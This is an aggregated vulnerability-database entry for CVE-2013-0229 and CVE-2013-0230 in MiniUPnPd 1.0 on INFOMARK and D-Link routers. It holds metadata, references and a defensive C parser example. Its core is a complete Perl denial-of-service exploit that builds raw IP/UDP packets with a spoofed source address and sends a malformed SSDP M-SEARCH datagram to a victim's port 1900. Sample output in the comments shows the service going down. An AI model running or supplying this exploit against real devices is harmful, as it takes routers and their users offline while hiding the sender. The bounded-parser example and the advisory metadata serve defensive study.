ID

VAR-E-201301-0049


CVE

cve_id:CVE-2013-0229

Trust: 3.0

cve_id:CVE-2013-0230

Trust: 2.8

sources: BID: 57607 // BID: 57608 // PACKETSTORM: 131651 // PACKETSTORM: 132599 // PACKETSTORM: 121873 // EXPLOIT-DB: 37517 // EDBNET: 58727 // EDBNET: 23462

EDB ID

37517


TITLE

INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 37517

DESCRIPTION

INFOMARK IMW-C920W MiniUPnPd 1.0 - Denial of Service. CVE-2013-0230, CVE-2013-0229, CVE-89625, CVE-89624. DoS exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 37517

AFFECTED PRODUCTS

vendor: infomark // model: imw-c920w miniupnpd // scope: eq // version: 1.0

Trust: 2.2

vendor: miniupnp // model: project miniupnp // scope: eq // version: 1.0

Trust: 0.6

vendor: miniupnp // model: project miniupnp // scope: ne // version: 1.4

Trust: 0.6

vendor: miniupnpd // model: - // scope: eq // version: 1.0

Trust: 0.5

vendor: miniupnpd // model: remote // scope: eq // version: 1.0

Trust: 0.5

vendor: miniupnpd // model: stack buffer overflow // scope: eq // version: 1.0

Trust: 0.5

vendor: miniupnp // model: project miniupnp // scope: eq // version: 1.3

Trust: 0.3

vendor: d link // model: dir-836l // scope: eq // version: 1.03

Trust: 0.3

vendor: d link // model: dir-826l 1.04b05 // scope: - // version: -

Trust: 0.3

vendor: d link // model: dir-636l // scope: eq // version: 1.03

Trust: 0.3

vendor: d link // model: dir-626l // scope: eq // version: 1.03

Trust: 0.3

vendor: miniupnp // model: project miniupnp // scope: ne // version: 1.3

Trust: 0.3

vendor: miniupnp // model: project miniupnp // scope: ne // version: 1.1

Trust: 0.3

vendor: d link // model: dir-836l 1.04b09 // scope: ne // version: -

Trust: 0.3

vendor: d link // model: dir-826l 1.05b06 // scope: ne // version: -

Trust: 0.3

vendor: d link // model: dir-636l 1.05b07 // scope: ne // version: -

Trust: 0.3

vendor: d link // model: dir-626l 1.04b04 // scope: ne // version: -

Trust: 0.3

sources: BID: 57607 // BID: 57608 // PACKETSTORM: 131651 // PACKETSTORM: 132599 // PACKETSTORM: 121873 // EXPLOIT-DB: 37517 // EDBNET: 58727 // EDBNET: 23462

EXPLOIT

#!/usr/bin/perl
#
# miniupnpd/1.0 remote denial of service exploit
#
# Copyright 2015 (c) Todor Donev
# todor.donev@gmail.com
# http://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# The SSDP protocol can discover Plug & Play devices,
# with uPnP (Universal Plug and Play). SSDP is an HTTP-
# like protocol and works with NOTIFY and M-SEARCH
# methods.
#
# See also:
# CVE-2013-0229
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
# CVE-2013-0230
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
#
# Tested on
# Device Name : IMW-C920W
# Device Manufacturer : INFOMARK (http://infomark.co.kr)
#
# These devices are commonly used by Max Telecom, Bulgaria
#
# Disclaimer:
# This and previous programs are for educational
# purposes ONLY. Do not use them without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk!
#
# See also:
# SSDP Reflection DDoS Attacks
# http://tinyurl.com/mqwj6xt
#
#######################################
#
# # perl miniupnpd.pl
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Usage:
# [ ./miniupnpd.pl <victim address> <spoofed address>
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
# [ Example:
# [ perl miniupnpd.pl 192.168.1.1
# [ =============================================== ]
# [ 2015 <todor.donev@gmail.com> Todor Donev 2015 ]
#
# # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00078s latency).
# PORT STATE SERVICE
# 1900/udp open upnp
# | upnp-info:
# | 192.168.1.1
# | Server: 1.0 UPnP/1.0 miniupnpd/1.0
# | Location: http://192.168.1.1:5000/rootDesc.xml
# | Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
# | Name: INFOMARK Router
# | Manufacturer: INFOMARK
# | Model Descr: INFOMARK Router
# | Model Name: INFOMARK Router
# | Model Version: 1
# | Name: WANDevice
# | Manufacturer: MiniUPnP
# | Model Descr: WAN Device
# | Model Name: WAN Device
# | Model Version: 20070228
# | Name: WANConnectionDevice
# | Manufacturer: MiniUPnP
# | Model Descr: MiniUPnP daemon
# | Model Name: MiniUPnPd
# |_ Model Version: 20070228
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
#
# # perl miniupnpd.pl 192.168.1.1
#
# [ miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Target: 192.168.1.1
# [ Send malformed SSDP packet..
#
# # nmap -sU 192.168.1.1 -p1900
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00085s latency).
# PORT STATE SERVICE
# 1900/udp closed upnp // GOOD NIGHT, SWEET PRINCE.... :D
# MAC Address: 00:00:00:00:00:00 (Infomark Co.) // CENSORED
#
# Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
#
#
# Special thanks to HD Moore ..
#

use strict;
use warnings;
use Socket;

if ( $< != 0 ) {
    print "Sorry, must be run as root!\n";
    print "This script uses a RAW socket.\n";
    exit;
}

# Target and (optional) spoofed source, resolved to packed 4-byte addresses.
# If no spoofed address is given, a random one is generated in iphdr().
my $ip_dst = defined $ARGV[0] ? (gethostbyname($ARGV[0]))[4] : undef;
my $ip_src = defined $ARGV[1] ? (gethostbyname($ARGV[1]))[4] : undef;

print "\n[ miniupnpd/1.0 remote denial of service exploit ]\n";
print "[ =============================================== ]\n";
select(undef, undef, undef, 0.40);

if (!defined $ip_dst) {
    print "[ Usage:\n[ ./$0 <victim address> <spoofed address>\n";
    select(undef, undef, undef, 0.55);
    print "[ Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
    print "[ Example:\n[ perl $0 192.168.1.1\n";
    print "[ =============================================== ]\n";
    print "[ 2015 <todor.donev\@gmail.com> Todor Donev 2015 ]\n\n";
    exit;
}

# Raw IPv4 socket (IPPROTO_RAW = 255) with IP_HDRINCL, so the IP header built
# below is sent as-is. On Linux the kernel still fills in the IP checksum and
# total length, and the source address if it is left as 0.0.0.0.
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, IPPROTO_IP, IP_HDRINCL, 1) or die $!;
main();

# Main program
sub main {
    my $packet;

    $packet  = iphdr();
    $packet .= udphdr();
    $packet .= payload();
    # b000000m...
    send_packet($packet);
}

# IP header (Layer 3)
sub iphdr {
    my $ip_ver         = 4;                          # IP version 4 (4 bits)
    my $iphdr_len      = 5;                          # IP header length in 32-bit words (4 bits)
    my $ip_tos         = 0;                          # Differentiated Services (8 bits)
    my $ip_total_len   = 20 + 8 + length(payload()); # IP header + UDP header + data (16 bits)
    my $ip_frag_id     = 0;                          # Identification field (16 bits)
    my $ip_frag_flag   = '000';                      # IP frag flags (R DF MF) (3 bits)
    my $ip_frag_offset = '0' x 13;                   # IP fragment offset (13 bits)
    my $ip_ttl         = 255;                        # IP TTL (8 bits)
    my $ip_proto       = 17;                         # IP protocol: UDP (8 bits)
    my $ip_checksum    = 0;                          # IP checksum, computed by the kernel (16 bits)
    # Random spoofed source when none was given on the command line.
    $ip_src = inet_aton(randip()) unless defined $ip_src;
    # IP packet construction ('C' packs TTL and protocol as one unsigned byte each)
    my $iphdr = pack(
        'H2 H2 n n B16 C C n a4 a4',
        $ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
        $ip_frag_id, $ip_frag_flag . $ip_frag_offset,
        $ip_ttl, $ip_proto, $ip_checksum,
        $ip_src, $ip_dst
    );

    return $iphdr;
}

# UDP header (Layer 4)
sub udphdr {
    my $udp_src_port = 31337;                 # UDP source port (16 bits)
    my $udp_dst_port = 1900;                  # UDP destination port: SSDP (16 bits)
    my $udp_len      = 8 + length(payload()); # UDP header + data length (16 bits)
    my $udp_checksum = 0;                     # UDP checksum (16 bits); 0 = none, allowed for IPv4

    # UDP packet
    my $udphdr = pack(
        'n n n n',
        $udp_src_port, $udp_dst_port,
        $udp_len, $udp_checksum
    );
    return $udphdr;
}

# Create SSDP bomb
sub payload {
    # Note: "\\r\\n" in a double-quoted string is the four literal characters
    # \ r \ n, not CRLF, so this request line is never terminated.
    my $data = "M-SEARCH * HTTP\/1.1\\r\\n";
    # 1261 random uppercase letters (A..Y) make up the rest of the datagram
    for (0..1260) { $data .= chr( int(rand(25)) + 65 ); }
    return $data;
}

# Generate random source ip address (dotted quad)
sub randip {
    return join('.', map { int(rand(256)) } 1 .. 4);
}

# Send the malformed packet
sub send_packet {
    my ($packet) = @_;
    print "[ Target: $ARGV[0]\n";
    select(undef, undef, undef, 0.30);
    print "[ Send malformed SSDP packet..\n\n";
    # The port in the sockaddr is ignored for raw sockets; only the address matters.
    send(RAW, $packet, 0, pack_sockaddr_in(0, $ip_dst)) or die $!;
}

Trust: 1.0

sources: EXPLOIT-DB: 37517
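An added example, written for this page and not taken from MiniUPnPd or from the exploit's author: a bounded parser for the ST header of an SSDP M-SEARCH datagram, run over constructed sample datagrams including one shaped like the script's payload. NVD describes CVE-2013-0229 as a buffer over-read in ProcessSSDPRequest; what the code shows is the check such a handler needs (stop at the received length, not only at CR/LF) and that a datagram like the script's, which contains no real CRLF, never yields a complete header line under that check. The sample datagrams, the function and type names, and the fixed letters standing in for the script's random ones are this example's own assumptions.

```c
/* Added example (not MiniUPnPd code): a bounded scan for the ST header of an
 * SSDP M-SEARCH datagram.  The scan that goes wrong in this bug class is the
 * one that looks for the CR/LF ending the ST value without also checking the
 * datagram length; here both are checked, and a datagram whose ST line never
 * ends is reported instead of over-read. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp (POSIX) */

enum ssdp_verdict {
    SSDP_OK = 0,           /* M-SEARCH with a CR/LF-terminated ST header */
    SSDP_NOT_MSEARCH = 1,  /* request line is not M-SEARCH */
    SSDP_NO_ST = 2,        /* M-SEARCH without a complete ST header line */
    SSDP_UNTERMINATED = 3  /* ST value runs into the end of the datagram */
};

typedef struct {
    enum ssdp_verdict verdict;
    size_t st_off;   /* offset of the ST value within the datagram */
    size_t st_len;   /* bytes of the ST value present in the datagram */
} ssdp_parse;

/* Every access bufr[k] below satisfies k < n, where n is the received length. */
ssdp_parse parse_msearch(const unsigned char *bufr, size_t n)
{
    ssdp_parse r = { SSDP_NO_ST, 0, 0 };
    size_t i = 0;

    if (n < 8 || memcmp(bufr, "M-SEARCH", 8) != 0) {
        r.verdict = SSDP_NOT_MSEARCH;
        return r;
    }
    while (i < n) {
        /* skip to the byte after the next CRLF; give up if no CRLF is left */
        while (i + 1 < n && !(bufr[i] == '\r' && bufr[i + 1] == '\n'))
            i++;
        if (i + 1 >= n)
            break;
        i += 2;
        if (n - i >= 3 && strncasecmp((const char *)bufr + i, "st:", 3) == 0) {
            size_t st = i + 3;
            while (st < n && (bufr[st] == ' ' || bufr[st] == '\t'))
                st++;
            r.st_off = st;
            /* the "< n" bound is what keeps this scan inside the datagram */
            while (st + r.st_len < n && bufr[st + r.st_len] != '\r' &&
                   bufr[st + r.st_len] != '\n')
                r.st_len++;
            r.verdict = (st + r.st_len < n) ? SSDP_OK : SSDP_UNTERMINATED;
            return r;
        }
    }
    return r;
}

/* Constructed sample datagrams (not captured traffic). */
static const char SAMPLE_GOOD[] =
    "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\n"
    "MAN: \"ssdp:discover\"\r\nMX: 2\r\nST: ssdp:all\r\n\r\n";
static const char SAMPLE_UNTERMINATED[] =
    "M-SEARCH * HTTP/1.1\r\nST: "
    "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA" "AAAAAAAAAA";   /* 40 bytes, no CRLF */
static const char SAMPLE_NOTIFY[] =
    "NOTIFY * HTTP/1.1\r\nNT: upnp:rootdevice\r\n\r\n";

/* Same shape as the page's exploit payload: the request line carries the four
 * literal characters \ r \ n (no real CRLF) followed by 1261 letters, so no
 * header line ever completes.  Letters are fixed here instead of random. */
enum ssdp_verdict exploit_shaped_verdict(void)
{
    static const char head[] = "M-SEARCH * HTTP/1.1\\r\\n";   /* 23 bytes */
    unsigned char buf[sizeof(head) - 1 + 1261];
    memcpy(buf, head, sizeof(head) - 1);
    memset(buf + sizeof(head) - 1, 'A', 1261);
    return parse_msearch(buf, sizeof buf).verdict;
}

int main(void)
{
    static const char *names[] = { "ok", "not-msearch", "no-st", "unterminated" };
    ssdp_parse g = parse_msearch((const unsigned char *)SAMPLE_GOOD, sizeof SAMPLE_GOOD - 1);
    ssdp_parse u = parse_msearch((const unsigned char *)SAMPLE_UNTERMINATED,
                                 sizeof SAMPLE_UNTERMINATED - 1);
    printf("good:         %s (ST value %zu bytes)\n", names[g.verdict], g.st_len);
    printf("unterminated: %s (%zu bytes before end of datagram)\n", names[u.verdict], u.st_len);
    printf("notify:       %s\n",
           names[parse_msearch((const unsigned char *)SAMPLE_NOTIFY, sizeof SAMPLE_NOTIFY - 1).verdict]);
    printf("exploit-like: %s\n", names[exploit_shaped_verdict()]);
    return 0;
}
```

Build with `cc -o ssdp_check ssdp_check.c` on a POSIX system. To triage what a fuzzer or the script above actually put on the wire, pass the captured UDP payload and its length to parse_msearch; an SSDP_UNTERMINATED verdict is exactly the input shape an unbounded CR/LF scan would read past.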

EXPLOIT LANGUAGE

pl

Trust: 0.6

sources: EXPLOIT-DB: 37517

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 37517

TYPE

Denial of Service

Trust: 1.6

sources: EXPLOIT-DB: 37517 // EDBNET: 58727

TAGS

tag:exploit

Trust: 1.5

tag:remote

Trust: 1.0

tag:overflow

Trust: 1.0

tag:shell

Trust: 0.5

tag:code execution

Trust: 0.5

tag:denial of service

Trust: 0.5

tag:web

Trust: 0.5

sources: PACKETSTORM: 131651 // PACKETSTORM: 132599 // PACKETSTORM: 121873

CREDITS

Todor Donev

Trust: 0.6

sources: EXPLOIT-DB: 37517

EXTERNAL IDS

db: NVD // id: CVE-2013-0230

Trust: 4.0

db: NVD // id: CVE-2013-0229

Trust: 3.0

db: EXPLOIT-DB // id: 37517

Trust: 1.6

db: EDBNET // id: 58727

Trust: 0.6

db: 0DAYTODAY // id: 23837

Trust: 0.6

db: EDBNET // id: 23462

Trust: 0.6

db: PACKETSTORM // id: 131651

Trust: 0.5

db: PACKETSTORM // id: 132599

Trust: 0.5

db: PACKETSTORM // id: 121873

Trust: 0.5

db: CERT/CC // id: VU#922681

Trust: 0.3

db: BID // id: 57607

Trust: 0.3

db: BID // id: 57608

Trust: 0.3

sources: BID: 57607 // BID: 57608 // PACKETSTORM: 131651 // PACKETSTORM: 132599 // PACKETSTORM: 121873 // EXPLOIT-DB: 37517 // EDBNET: 58727 // EDBNET: 23462

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2013-0229

Trust: 2.7

url:https://nvd.nist.gov/vuln/detail/cve-2013-0230

Trust: 2.5

url:https://www.exploit-db.com/exploits/37517/

Trust: 0.6

url:https://0day.today/exploits/23837

Trust: 0.6

url:https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play

Trust: 0.3

url:http://www.kb.cert.org/vuls/id/922681

Trust: 0.3

url:http://miniupnp.free.fr/

Trust: 0.3

url:https://community.rapid7.com/servlet/jiveservlet/download/2150-1-16596/securityflawsupnp.pdf

Trust: 0.3

sources: BID: 57607 // PACKETSTORM: 131651 // PACKETSTORM: 132599 // PACKETSTORM: 121873 // EXPLOIT-DB: 37517 // EDBNET: 58727 // EDBNET: 23462

SOURCES

db: BID // id: 57607
db: BID // id: 57608
db: PACKETSTORM // id: 131651
db: PACKETSTORM // id: 132599
db: PACKETSTORM // id: 121873
db: EXPLOIT-DB // id: 37517
db: EDBNET // id: 58727
db: EDBNET // id: 23462

LAST UPDATE DATE

2022-07-27T09:12:09.060000+00:00


SOURCES UPDATE DATE

db: BID // id: 57607 // date: 2013-01-28T00:00:00
db: BID // id: 57608 // date: 2015-05-12T19:46:00

SOURCES RELEASE DATE

db: BID // id: 57607 // date: 2013-01-28T00:00:00
db: BID // id: 57608 // date: 2013-01-28T00:00:00
db: PACKETSTORM // id: 131651 // date: 2015-04-27T15:55:55
db: PACKETSTORM // id: 132599 // date: 2015-07-08T00:53:09
db: PACKETSTORM // id: 121873 // date: 2013-06-05T00:50:31
db: EXPLOIT-DB // id: 37517 // date: 2015-07-07T00:00:00
db: EDBNET // id: 58727 // date: 2015-07-07T00:00:00
db: EDBNET // id: 23462 // date: 2015-07-08T00:00:00